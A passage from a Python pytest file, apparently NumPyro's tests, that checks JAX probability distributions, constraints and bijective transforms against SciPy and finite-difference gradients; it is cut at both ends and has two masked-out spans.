dist.LKJCholesky]:\n pytest.skip('we have separated tests for LKJCholesky distribution')\n if jax_dist is _ImproperWrapper:\n pytest.skip(\n 'no param for ImproperUniform to test for log_prob gradient')\n rng_key = random.PRNGKey(0)\n value = jax_dist(*params).sample(rng_key)\n\n def fn(*args):\n return jnp.sum(jax_dist(*args).log_prob(value))\n eps = 0.001\n for i in range(len(params)):\n if jax_dist is dist.EulerMaruyama and i == 1:\n continue\n if jax_dist is _SparseCAR and i == 3:\n continue\n if isinstance(params[i], dist.Distribution):\n continue\n if params[i] is None or jnp.result_type(params[i]) in (jnp.int32,\n jnp.int64):\n continue\n actual_grad = jax.grad(fn, i)(*params)\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(params)]\n args_rhs = [(p if j != i else p + eps) for j, p in enumerate(params)]\n fn_lhs = fn(*args_lhs)\n fn_rhs = fn(*args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad) == jnp.shape(params[i])\n if i == 0 and jax_dist is dist.Delta:\n expected_grad = 0.0\n assert_allclose(jnp.sum(actual_grad), expected_grad, rtol=0.01,\n atol=0.01)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_mean_var(jax_dist, sp_dist, params):\n if jax_dist is _ImproperWrapper:\n pytest.skip('Improper distribution does not has mean/var implemented')\n if jax_dist is FoldedNormal:\n pytest.skip('Folded distribution does not has mean/var implemented')\n if jax_dist is dist.EulerMaruyama:\n pytest.skip(\n 'EulerMaruyama distribution does not has mean/var implemented')\n if jax_dist is dist.RelaxedBernoulliLogits:\n pytest.skip(\n 'RelaxedBernoulli distribution does not has mean/var implemented')\n if 'SineSkewed' in jax_dist.__name__:\n pytest.skip('Skewed Distribution are not symmetric about location.')\n if jax_dist in (_TruncatedNormal, _TruncatedCauchy, dist.\n LeftTruncatedDistribution, dist.RightTruncatedDistribution, dist.\n TwoSidedTruncatedDistribution):\n pytest.skip('Truncated distributions do not has mean/var implemented')\n if jax_dist is dist.ProjectedNormal:\n pytest.skip('Mean is defined in submanifold')\n n = 20000 if jax_dist in [dist.LKJ, dist.LKJCholesky, dist.\n SineBivariateVonMises] else 200000\n d_jax = jax_dist(*params)\n k = random.PRNGKey(0)\n samples = d_jax.sample(k, sample_shape=(n,)).astype(np.float32)\n if sp_dist and not _is_batched_multivariate(d_jax) and jax_dist not in [\n dist.VonMises, dist.MultivariateStudentT, dist.MatrixNormal]:\n d_sp = sp_dist(*params)\n try:\n sp_mean = d_sp.mean()\n except TypeError:\n sp_mean = d_sp.mean\n if d_jax.event_shape:\n try:\n sp_var = jnp.diag(d_sp.cov())\n except TypeError:\n sp_var = jnp.diag(d_sp.cov)\n except AttributeError:\n sp_var = d_sp.var()\n else:\n sp_var = d_sp.var()\n assert_allclose(d_jax.mean, sp_mean, rtol=0.01, atol=1e-07)\n assert_allclose(d_jax.variance, sp_var, rtol=0.01, atol=1e-07)\n if jnp.all(jnp.isfinite(sp_mean)):\n assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05,\n atol=0.01)\n if jnp.all(jnp.isfinite(sp_var)):\n assert_allclose(jnp.std(samples, 0), jnp.sqrt(d_jax.variance),\n rtol=0.05, atol=0.01)\n elif jax_dist in [dist.LKJ, dist.LKJCholesky]:\n if jax_dist is dist.LKJCholesky:\n corr_samples = jnp.matmul(samples, jnp.swapaxes(samples, -2, -1))\n else:\n corr_samples = samples\n dimension, concentration, _ = params\n marginal = dist.Beta(concentration + 0.5 * (dimension - 2), \n concentration + 0.5 * (dimension - 2))\n marginal_mean = 2 * marginal.mean - 1\n marginal_std = 2 * jnp.sqrt(marginal.variance)\n expected_mean = jnp.broadcast_to(jnp.reshape(marginal_mean, jnp.\n shape(marginal_mean) + (1, 1)), jnp.shape(marginal_mean) +\n d_jax.event_shape)\n expected_std = jnp.broadcast_to(jnp.reshape(marginal_std, jnp.shape\n (marginal_std) + (1, 1)), jnp.shape(marginal_std) + d_jax.\n event_shape)\n expected_mean = expected_mean * (1 - jnp.identity(dimension)\n ) + jnp.identity(dimension)\n expected_std = expected_std * (1 - jnp.identity(dimension))\n assert_allclose(jnp.mean(corr_samples, axis=0), expected_mean, atol\n =0.01)\n assert_allclose(jnp.std(corr_samples, axis=0), expected_std, atol=0.01)\n elif jax_dist in [dist.VonMises]:\n assert_allclose(d_jax.mean, jnp.mean(samples, 0), rtol=0.05, atol=0.01)\n x, y = jnp.mean(jnp.cos(samples), 0), jnp.mean(jnp.sin(samples), 0)\n expected_variance = 1 - jnp.sqrt(x ** 2 + y ** 2)\n assert_allclose(d_jax.variance, expected_variance, rtol=0.05, atol=0.01\n )\n elif jax_dist in [dist.SineBivariateVonMises]:\n phi_loc = _circ_mean(samples[..., 0])\n psi_loc = _circ_mean(samples[..., 1])\n assert_allclose(d_jax.mean, jnp.stack((phi_loc, psi_loc), axis=-1),\n rtol=0.05, atol=0.01)\n elif jax_dist in [dist.MatrixNormal]:\n sample_shape = 200000,\n if len(d_jax.batch_shape) > 0:\n axes = [(len(sample_shape) + i) for i in range(len(d_jax.\n batch_shape))]\n axes = tuple(axes)\n samples_re = jnp.moveaxis(samples, axes, jnp.arange(len(axes)))\n subshape = samples_re.shape[:len(axes)]\n ixi = product(*[range(k) for k in subshape])\n for ix in ixi:\n\n def get_min_shape(ix, batch_shape):\n return min(ix, tuple(map(lambda x: x - 1, batch_shape)))\n ix_loc = get_min_shape(ix, d_jax.loc.shape[:len(ix)])\n jnp.allclose(jnp.mean(samples_re[ix], 0), jnp.squeeze(d_jax\n .mean[ix_loc]), rtol=0.5, atol=0.01)\n samples_mvn = jnp.squeeze(samples_re[ix]).reshape(\n sample_shape + (-1,), order='F')\n ix_col = get_min_shape(ix, d_jax.scale_tril_column.shape[:\n len(ix)])\n ix_row = get_min_shape(ix, d_jax.scale_tril_row.shape[:len(ix)]\n )\n scale_tril = my_kron(d_jax.scale_tril_column[ix_col], d_jax\n .scale_tril_row[ix_row])\n sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))\n jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=0.01\n )\n else:\n jnp.allclose(jnp.mean(samples, 0), jnp.squeeze(d_jax.mean),\n rtol=0.5, atol=0.01)\n samples_mvn = jnp.squeeze(samples).reshape(sample_shape + (-1,),\n order='F')\n scale_tril = my_kron(jnp.squeeze(d_jax.scale_tril_column), jnp.\n squeeze(d_jax.scale_tril_row))\n sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))\n jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=0.01)\n else:\n if jnp.all(jnp.isfinite(d_jax.mean)):\n assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05,\n atol=0.01)\n if isinstance(d_jax, dist.CAR):\n pytest.skip(\n 'CAR distribution does not have `variance` implemented.')\n if isinstance(d_jax, dist.Gompertz):\n pytest.skip(\n 'Gompertz distribution does not have `variance` implemented.')\n if jnp.all(jnp.isfinite(d_jax.variance)):\n assert_allclose(jnp.std(samples, 0), jnp.sqrt(d_jax.variance),\n rtol=0.05, atol=0.01)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_distribution_constraints(jax_dist, sp_dist, params, prepend_shape):\n if jax_dist in (_TruncatedNormal, _TruncatedCauchy, _GaussianMixture,\n _Gaussian2DMixture, _GeneralMixture, _General2DMixture):\n pytest.skip(f'{jax_dist.__name__} is a function, not a class')\n dist_args = [p for p in inspect.getfullargspec(jax_dist.__init__)[0][1:]]\n valid_params, oob_params = list(params), list(params)\n key = random.PRNGKey(1)\n dependent_constraint = False\n for i in range(len(params)):\n if jax_dist in (_ImproperWrapper, dist.LKJ, dist.LKJCholesky\n ) and dist_args[i] != 'concentration':\n continue\n if 'SineSkewed' in jax_dist.__name__ and dist_args[i] != 'skewness':\n continue\n if jax_dist is dist.EulerMaruyama and dist_args[i] != 't':\n continue\n if jax_dist is dist.TwoSidedTruncatedDistribution and dist_args[i\n ] == 'base_dist':\n continue\n if jax_dist is dist.GaussianRandomWalk and dist_args[i] == 'num_steps':\n continue\n if jax_dist is dist.SineBivariateVonMises and dist_args[i\n ] == 'weighted_correlation':\n continue\n if params[i] is None:\n oob_params[i] = None\n valid_params[i] = None\n continue\n constraint = jax_dist.arg_constraints[dist_args[i]]\n if isinstance(constraint, constraints._Dependent):\n dependent_constraint = True\n break\n key, key_gen = random.split(key)\n oob_params[i] = gen_values_outside_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n valid_params[i] = gen_values_within_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n if jax_dist is dist.MultivariateStudentT:\n valid_params[0] += 1\n if jax_dist is dist.LogUniform:\n valid_params[1] += valid_params[0]\n assert jax_dist(*oob_params)\n if not dependent_constraint and (jax_dist is not _ImproperWrapper and \n 'SineSkewed' not in jax_dist.__name__):\n with pytest.raises(ValueError):\n jax_dist(*oob_params, validate_args=True)\n with pytest.raises(ValueError):\n oob_params = jax.device_get(oob_params)\n\n def dist_gen_fn():\n d = jax_dist(*oob_params, validate_args=True)\n return d\n jax.jit(dist_gen_fn)()\n d = jax_dist(*valid_params, validate_args=True)\n if sp_dist and not _is_batched_multivariate(d) and not (d.event_shape and\n prepend_shape):\n valid_samples = gen_values_within_bounds(d.support, size=\n prepend_shape + d.batch_shape + d.event_shape)\n try:\n expected = sp_dist(*valid_params).logpdf(valid_samples)\n except AttributeError:\n expected = sp_dist(*valid_params).logpmf(valid_samples)\n assert_allclose(d.log_prob(valid_samples), expected, atol=1e-05,\n rtol=1e-05)\n oob_samples = gen_values_outside_bounds(d.support, size=prepend_shape +\n d.batch_shape + d.event_shape)\n with pytest.warns(UserWarning, match='Out-of-support'):\n d.log_prob(oob_samples)\n with pytest.warns(UserWarning, match='Out-of-support'):\n oob_samples = jax.device_get(oob_samples)\n valid_params = jax.device_get(valid_params)\n\n def log_prob_fn():\n d = jax_dist(*valid_params, validate_args=True)\n return d.log_prob(oob_samples)\n jax.jit(log_prob_fn)()\n\n\ndef test_omnistaging_invalid_param():\n\n def f(x):\n return dist.LogNormal(x, -np.ones(2), validate_args=True).log_prob(0)\n with pytest.raises(ValueError, match='got invalid'):\n jax.jit(f)(0)\n\n\ndef test_omnistaging_invalid_sample():\n\n def f(x):\n return dist.LogNormal(x, np.ones(2), validate_args=True).log_prob(-1)\n with pytest.warns(UserWarning, match='Out-of-support'):\n jax.jit(f)(0)\n\n\ndef test_categorical_log_prob_grad():\n data = jnp.repeat(jnp.arange(3), 10)\n\n def f(x):\n return dist.Categorical(jax.nn.softmax(x * jnp.arange(1, 4))).log_prob(\n data).sum()\n\n def g(x):\n return dist.Categorical(logits=x * jnp.arange(1, 4)).log_prob(data\n ).sum()\n x = 0.5\n fx, grad_fx = jax.value_and_grad(f)(x)\n gx, grad_gx = jax.value_and_grad(g)(x)\n assert_allclose(fx, gx, rtol=1e-06)\n assert_allclose(grad_fx, grad_gx, atol=0.0001)\n\n\ndef test_beta_proportion_invalid_mean():\n with dist.distribution.validation_enabled(), pytest.raises(ValueError,\n match='^BetaProportion distribution got invalid mean parameter\\\\.$'):\n dist.BetaProportion(1.0, 1.0)\n\n\[email protected]('constraint, x, expected', [(constraints.boolean,\n np.array([True, False]), np.array([True, True])), (constraints.boolean,\n np.array([1, 1]), np.array([True, True])), (constraints.boolean, np.\n array([-1, 1]), np.array([False, True])), (constraints.corr_cholesky,\n np.array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]), np.array([True, False\n ])), (constraints.corr_cholesky, np.array([[[1, 0], [1, 0]], [[1, 0], [\n 0.5, 0.5]]]), np.array([False, False])), (constraints.corr_matrix, np.\n array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]), np.array([True, False])),\n (constraints.corr_matrix, np.array([[[1, 0], [1, 0]], [[1, 0], [0.5, \n 0.5]]]), np.array([False, False])), (constraints.greater_than(1), 3, \n True), (constraints.greater_than(1), np.array([-1, 1, 5]), np.array([\n False, False, True])), (constraints.integer_interval(-3, 5), 0, True),\n (constraints.integer_interval(-3, 5), np.array([-5, -3, 0, 1.1, 5, 7]),\n np.array([False, True, True, False, True, False])), (constraints.\n interval(-3, 5), 0, True), (constraints.interval(-3, 5), np.array([-5, \n -3, 0, 5, 7]), np.array([False, True, True, True, False])), (\n constraints.less_than(1), -2, True), (constraints.less_than(1), np.\n array([-1, 1, 5]), np.array([True, False, False])), (constraints.\n lower_cholesky, np.array([[1.0, 0.0], [-2.0, 0.1]]), True), (\n constraints.lower_cholesky, np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0,\n 0.1], [2.0, 0.2]]]), np.array([False, False])), (constraints.\n nonnegative_integer, 3, True), (constraints.nonnegative_integer, np.\n array([-1.0, 0.0, 5.0]), np.array([False, True, True])), (constraints.\n positive, 3, True), (constraints.positive, np.array([-1, 0, 5]), np.\n array([False, False, True])), (constraints.positive_definite, np.array(\n [[1.0, 0.3], [0.3, 1.0]]), True), (constraints.positive_definite, np.\n array([[[2.0, 0.4], [0.3, 2.0]], [[1.0, 0.1], [0.1, 0.0]]]), np.array([\n False, False])), (constraints.positive_integer, 3, True), (constraints.\n positive_integer, np.array([-1.0, 0.0, 5.0]), np.array([False, False, \n True])), (constraints.real, -1, True), (constraints.real, np.array([np.\n inf, -np.inf, np.nan, np.pi]), np.array([False, False, False, True])),\n (constraints.simplex, np.array([0.1, 0.3, 0.6]), True), (constraints.\n simplex, np.array([[0.1, 0.3, 0.6], [-0.1, 0.6, 0.5], [0.1, 0.6, 0.5]]),\n np.array([True, False, False])), (constraints.softplus_positive, 3, \n True), (constraints.softplus_positive, np.array([-1, 0, 5]), np.array([\n False, False, True])), (constraints.softplus_lower_cholesky, np.array([\n [1.0, 0.0], [-2.0, 0.1]]), True), (constraints.softplus_lower_cholesky,\n np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0, 0.1], [2.0, 0.2]]]), np.\n array([False, False])), (constraints.unit_interval, 0.1, True), (\n constraints.unit_interval, np.array([-5, 0, 0.5, 1, 7]), np.array([\n False, True, True, True, False])), (constraints.sphere, np.array([[1, 0,\n 0], [0.5, 0.5, 0]]), np.array([True, False])), (constraints.\n open_interval(0.0, 1.0), np.array([-5, 0, 0.5, 1, 7]), np.array([False,\n False, True, False, False]))])\ndef test_constraints(constraint, x, expected):\n v = constraint.feasible_like(x)\n if jnp.result_type(v) == 'float32' or jnp.result_type(v) == 'float64':\n assert not constraint.is_discrete\n assert_array_equal(constraint(x), expected)\n feasible_value = constraint.feasible_like(x)\n assert jnp.shape(feasible_value) == jnp.shape(x)\n assert_allclose(constraint(feasible_value), jnp.full(jnp.shape(expected\n ), True))\n try:\n inverse = biject_to(constraint).inv(feasible_value)\n except NotImplementedError:\n pass\n else:\n assert_allclose(inverse, jnp.zeros_like(inverse), atol=2e-07)\n\n\[email protected]('constraint', [constraints.corr_cholesky,\n constraints.corr_matrix, constraints.greater_than(2), constraints.\n interval(-3, 5), constraints.l1_ball, constraints.less_than(1),\n constraints.lower_cholesky, constraints.scaled_unit_lower_cholesky,\n constraints.ordered_vector, constraints.positive, constraints.\n positive_definite, constraints.positive_ordered_vector, constraints.\n real, constraints.real_vector, constraints.simplex, constraints.\n softplus_positive, constraints.softplus_lower_cholesky, constraints.\n unit_interval, constraints.open_interval(0.0, 1.0)], ids=lambda x: x.\n __class__)\[email protected]('shape', [(), (1,), (3,), (6,), (3, 1), (1, 3), (5,\n 3)])\ndef test_biject_to(constraint, shape):\n transform = biject_to(constraint)\n event_dim = transform.domain.event_dim\n if isinstance(constraint, constraints._Interval):\n assert transform.codomain.upper_bound == constraint.upper_bound\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._GreaterThan):\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._LessThan):\n assert transform.codomain.upper_bound == constraint.upper_bound\n if len(shape) < event_dim:\n return\n rng_key = random.PRNGKey(0)\n x = random.normal(rng_key, shape)\n y = transform(x)\n assert transform.forward_shape(x.shape) == y.shape\n assert transform.inverse_shape(y.shape) == x.shape\n x_nan = transform.inv(jnp.full(jnp.shape(y), np.nan))\n assert x_nan.shape == x.shape\n batch_shape = shape if event_dim == 0 else shape[:-1]\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape, dtype=\n jnp.bool_))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-05, rtol=1e-05)\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert jnp.shape(actual) == batch_shape\n if len(shape) == event_dim:\n if constraint is constraints.simplex:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x)[:-1, :])[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y)\n [:, :-1])[1]\n elif constraint in [constraints.real_vector, constraints.\n ordered_vector, constraints.positive_ordered_vector,\n constraints.l1_ball]:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n elif constraint in [constraints.corr_cholesky, constraints.corr_matrix\n ]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x),\n diagonal=-1)\n y_tril = matrix_to_tril_vec(y, diagonal=-1)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y, diagonal=-1)\n if constraint is constraints.corr_matrix:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1\n ) + jnp.identity(matrix.shape[-1])\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n elif constraint in [constraints.lower_cholesky, constraints.\n scaled_unit_lower_cholesky, constraints.positive_definite,\n constraints.softplus_lower_cholesky]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x))\n y_tril = matrix_to_tril_vec(y)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y)\n if constraint is constraints.positive_definite:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1) - jnp.diag(\n jnp.diag(matrix))\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-05, rtol=1e-05)\n assert_allclose(actual, -inv_expected, atol=1e-05, rtol=1e-05)\n\n\[email protected]('transform, event_shape', [(PermuteTransform(np.\n array([3, 0, 4, 1, 2])), (5,)), (PowerTransform(2.0), ()), (\n SoftplusTransform(), ()), (LowerCholeskyAffine(np.array([1.0, 2.0]), np\n .array([[0.6, 0.0], [1.5, 0.4]])), (2,)), (transforms.ComposeTransform(\n [biject_to(constraints.simplex), SimplexToOrderedTransform(0.0),\n biject_to(constraints.ordered_vector).inv]), (5,))])\[email protected]('batch_shape', [(), (1,), (3,), (6,), (3, 1), (1, \n 3), (5, 3)])\ndef test_bijective_transforms(transform, event_shape, batch_shape):\n shape = batch_shape + event_shape\n rng_key = random.PRNGKey(0)\n x = biject_to(transform.domain)(random.normal(rng_key, shape))\n y = transform(x)\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-06, rtol=0.0001)\n assert transform.inv.inv is transform\n assert transform.inv is transform.inv\n assert transform.domain is transform.inv.codomain\n assert transform.codomain is transform.inv.domain\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert_allclose(actual, -transform.inv.log_abs_det_jacobian(y, x))\n assert jnp.shape(actual) == batch_shape\n if len(shape) == transform.domain.event_dim:\n if len(event_shape) == 1:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-06)\n assert_allclose(actual, -inv_expected, atol=1e-06)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_composed_transform(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t1])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 2\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n expected_log_det = jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, y / 2\n ) + jnp.log(2) * 9\n assert_allclose(log_det, expected_log_det)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_composed_transform_1(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t2])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 3\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n z = t2(x * 2)\n expected_log_det = jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, z\n ) + t2.log_abs_det_jacobian(z, t2(z)).sum(-1)\n assert_allclose(log_det, expected_log_det)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_simplex_to_order_transform(batch_shape):\n simplex = jnp.arange(5.0) / jnp.arange(5.0).sum()\n simplex = jnp.broadcast_to(simplex, batch_shape + simplex.shape)\n transform = SimplexToOrderedTransform()\n out = transform(simplex)\n assert out.shape == transform.forward_shape(simplex.shape)\n assert simplex.shape == transform.inverse_shape(out.shape)\n\n\[email protected]('batch_shape', [(), (5,)])\[email protected]('prepend_event_shape', [(), (4,)])\[email protected]('sample_shape', [(), (7,)])\ndef test_transformed_distribution(batch_shape, prepend_event_shape,\n sample_shape):\n base_dist = dist.Normal(0, 1).expand(batch_shape + prepend_event_shape +\n (6,)).to_event(1 + len(prepend_event_shape))\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n d = dist.TransformedDistribution(base_dist, [t1, t2, t1])\n assert d.event_dim == 2 + len(prepend_event_shape)\n y = d.sample(random.PRNGKey(0), sample_shape)\n t = transforms.ComposeTransform([t1, t2, t1])\n x = t.inv(y)\n assert x.shape == sample_shape + base_dist.shape()\n log_prob = d.log_prob(y)\n assert log_prob.shape == sample_shape + batch_shape\n t_log_det = t.log_abs_det_jacobian(x, y)\n if prepend_event_shape:\n t_log_det = t_log_det.sum(-1)\n expected_log_prob = base_dist.log_prob(x) - t_log_det\n assert_allclose(log_prob, expected_log_prob, atol=1e-05)\n\n\[email protected]('transformed_dist', [dist.TransformedDistribution(\n dist.Normal(np.array([2.0, 3.0]), 1.0), transforms.ExpTransform()),\n dist.TransformedDistribution(dist.Exponential(jnp.ones(2)), [transforms\n .PowerTransform(0.7), transforms.AffineTransform(0.0, jnp.ones(2) * 3)])])\ndef test_transformed_distribution_intermediates(transformed_dist):\n sample, intermediates = transformed_dist.sample_with_intermediates(random\n .PRNGKey(1))\n assert_allclose(transformed_dist.log_prob(sample, intermediates),\n transformed_dist.log_prob(sample))\n\n\ndef test_transformed_transformed_distribution():\n loc, scale = -2, 3\n dist1 = dist.TransformedDistribution(dist.Normal(2, 3), transforms.\n PowerTransform(2.0))\n dist2 = dist.TransformedDistribution(dist1, transforms.AffineTransform(\n -2, 3))\n assert isinstance(dist2.base_dist, dist.Normal)\n assert len(dist2.transforms) == 2\n assert isinstance(dist2.transforms[0], transforms.PowerTransform)\n assert isinstance(dist2.transforms[1], transforms.AffineTransform)\n rng_key = random.PRNGKey(0)\n assert_allclose(loc + scale * dist1.sample(rng_key), dist2.sample(rng_key))\n intermediates = dist2.sample_with_intermediates(rng_key)\n assert len(intermediates) == 2\n\n\n<mask token>\n\n\[email protected]('ts', [[transforms.PowerTransform(0.7), transforms\n .AffineTransform(2.0, 3.0)], [transforms.ExpTransform()], [transforms.\n ComposeTransform([transforms.AffineTransform(-2, 3), transforms.\n ExpTransform()]), transforms.PowerTransform(3.0)], [_make_iaf(5,\n hidden_dims=[10], rng_key=random.PRNGKey(0)), transforms.\n PermuteTransform(jnp.arange(5)[::-1]), _make_iaf(5, hidden_dims=[10],\n rng_key=random.PRNGKey(1))]])\ndef test_compose_transform_with_intermediates(ts):\n transform = transforms.ComposeTransform(ts)\n x = random.normal(random.PRNGKey(2), (7, 5))\n y, intermediates = transform.call_with_intermediates(x)\n logdet = transform.log_abs_det_jacobian(x, y, intermediates)\n assert_allclose(y, transform(x))\n assert_allclose(logdet, transform.log_abs_det_jacobian(x, y))\n\n\[email protected]('x_dim, y_dim', [(3, 3), (3, 4)])\ndef test_unpack_transform(x_dim, y_dim):\n xy = np.random.randn(x_dim + y_dim)\n unpack_fn = lambda xy: {'x': xy[:x_dim], 'y': xy[x_dim:]}\n transform = transforms.UnpackTransform(unpack_fn)\n z = transform(xy)\n if x_dim == y_dim:\n with pytest.warns(UserWarning, match='UnpackTransform.inv'):\n t = transform.inv(z)\n else:\n t = transform.inv(z)\n assert_allclose(t, xy)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_generated_sample_distribution(jax_dist, sp_dist, params, N_sample=\n 100000, key=random.PRNGKey(11)):\n \"\"\"On samplers that we do not get directly from JAX, (e.g. we only get\n Gumbel(0,1) but also provide samplers for Gumbel(loc, scale)), also test\n agreement in the empirical distribution of generated samples between our\n samplers and those from SciPy.\n \"\"\"\n if jax_dist not in [dist.Gumbel]:\n pytest.skip(\n '{} sampling method taken from upstream, no need totest generated samples.'\n .format(jax_dist.__name__))\n jax_dist = jax_dist(*params)\n if sp_dist and not jax_dist.event_shape and not jax_dist.batch_shape:\n our_samples = jax_dist.sample(key, (N_sample,))\n ks_result = osp.kstest(our_samples, sp_dist(*params).cdf)\n assert ks_result.pvalue > 0.05\n\n\[email protected]('jax_dist, params, support', [(dist.\n BernoulliLogits, (5.0,), jnp.arange(2)), (dist.BernoulliProbs, (0.5,),\n jnp.arange(2)), (dist.BinomialLogits, (4.5, 10), jnp.arange(11)), (dist\n .BinomialProbs, (0.5, 11), jnp.arange(12)), (dist.BetaBinomial, (2.0, \n 0.5, 12), jnp.arange(13)), (dist.CategoricalLogits, (np.array([3.0, 4.0,\n 5.0]),), jnp.arange(3)), (dist.CategoricalProbs, (np.array([0.1, 0.5, \n 0.4]),), jnp.arange(3))])\[email protected]('batch_shape', [(5,), ()])\[email protected]('expand', [False, True])\ndef test_enumerate_support_smoke(jax_dist, params, support, batch_shape, expand\n ):\n p0 = jnp.broadcast_to(params[0], batch_shape + jnp.shape(params[0]))\n actual = jax_dist(p0, *params[1:]).enumerate_support(expand=expand)\n expected = support.reshape((-1,) + (1,) * len(batch_shape))\n if expand:\n expected = jnp.broadcast_to(expected, support.shape + batch_shape)\n assert_allclose(actual, expected)\n\n\ndef test_zero_inflated_enumerate_support():\n base_dist = dist.Bernoulli(0.5)\n d = dist.ZeroInflatedDistribution(base_dist, gate=0.5)\n assert d.has_enumerate_support\n assert_allclose(d.enumerate_support(), base_dist.enumerate_support())\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE)\[email protected]('prepend_shape', [(), (2, 3)])\[email protected]('sample_shape', [(), (4,)])\ndef test_expand(jax_dist, sp_dist, params, prepend_shape, sample_shape):\n jax_dist = jax_dist(*params)\n new_batch_shape = prepend_shape + jax_dist.batch_shape\n expanded_dist = jax_dist.expand(new_batch_shape)\n rng_key = random.PRNGKey(0)\n samples = expanded_dist.sample(rng_key, sample_shape)\n assert expanded_dist.batch_shape == new_batch_shape\n assert samples.shape == sample_shape + new_batch_shape + jax_dist.event_shape\n assert expanded_dist.log_prob(samples\n ).shape == sample_shape + new_batch_shape\n assert expanded_dist.expand((3,) + new_batch_shape).batch_shape == (3,\n ) + new_batch_shape\n if prepend_shape:\n with pytest.raises(ValueError, match=\n 'Cannot broadcast distribution of shape'):\n assert expanded_dist.expand((3,) + jax_dist.batch_shape)\n\n\[email protected]('base_shape', [(2, 1, 5), (3, 1), (2, 1, 1), (1, 1,\n 5)])\[email protected]('event_dim', [0, 1, 2, 3])\[email protected]('sample_shape', [(1000,), (1000, 7, 1), (1000, 1, 7)])\ndef test_expand_shuffle_regression(base_shape, event_dim, sample_shape):\n expand_shape = 2, 3, 5\n event_dim = min(event_dim, len(base_shape))\n loc = random.normal(random.PRNGKey(0), base_shape) * 10\n base_dist = dist.Normal(loc, 0.1).to_event(event_dim)\n expanded_dist = base_dist.expand(expand_shape[:len(expand_shape) -\n event_dim])\n samples = expanded_dist.sample(random.PRNGKey(1), sample_shape)\n expected_mean = jnp.broadcast_to(loc, sample_shape[1:] + expanded_dist.\n shape())\n assert_allclose(samples.mean(0), expected_mean, atol=0.1)\n\n\n<mask token>\n\n\ndef test_sine_bivariate_von_mises_sample_mean():\n loc = jnp.array([[2.0, -1.0], [-2, 1.0]])\n sine = SineBivariateVonMises(*loc, 5000, 5000, 0.0)\n samples = sine.sample(random.PRNGKey(0), (5000,))\n assert_allclose(_circ_mean(samples).T, loc, rtol=0.005)\n\n\[email protected]('batch_shape', [(), (4,)])\ndef test_polya_gamma(batch_shape, num_points=20000):\n d = 